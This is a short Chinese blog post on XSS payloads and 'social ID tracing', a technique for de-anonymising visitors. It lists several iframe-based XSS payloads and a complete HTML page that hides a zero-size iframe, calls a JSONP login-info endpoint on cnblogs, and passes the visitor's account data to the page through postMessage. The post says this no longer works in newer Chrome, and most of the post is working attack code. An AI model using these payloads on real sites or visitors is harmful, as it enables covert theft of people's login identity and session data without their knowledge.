可乐博客

浅谈XSS注入到黑客溯源

社交id溯源

社交id溯源的原理是,利用iFrame注入js脚本,动态添加jsonp的src实现外带cookies,但是在高版本chrome已经失效

这里测试使用的是chrome75,之前先要了解js callback机制

callback机制

调用的接口会返回一个函数体,直接执行callback函数

PAYLOAD

</iframe><iframe src="vbscript:msgbox(1)"></iframe> (IE)
</iframe><iframe src="data:text/html,<script>alert(0)</script>"></iframe> (Firefox, Chrome, Safari)

多种利用方式如下:

<iframe src="vbscript:msgbox(1)"></iframe> (IE)  
<iframe src="javascript:alert(1)"></iframe>
<iframe src="vbscript:msgbox(1)"></iframe> (IE)
<iframe src="data:text/html,<script>alert(0)</script>"></iframe> (Firefox, Chrome, Safari)
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe> (Firefox, Chrome, Safari)
http://target.com/something.jsp?query=<script>eval(location.hash.slice(1))</script>#alert(1)

整理payload

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Jsonp</title>
</head>
<body>
<!-- Jsonp -->

<!-- cnblogs -->
<iframe src="data:text/html,<script>eval(name)</script>" width="0" height="0" name="
    window.test = function(data) {
        let s = {source: 'cnblogs', d: data}; 
        window.parent.postMessage(s, '*');
    }
    let s = document.createElement('script');
    s.src = 'https://passport.cnblogs.com/user/LoginInfo?callback=test'
    document.documentElement.appendChild(s);
" style="border-width: 0px;"></iframe>

<script>
window.addEventListener("message", function(e){
        console.log(event.data);
}, false);
</script>

</body>
</html>
技术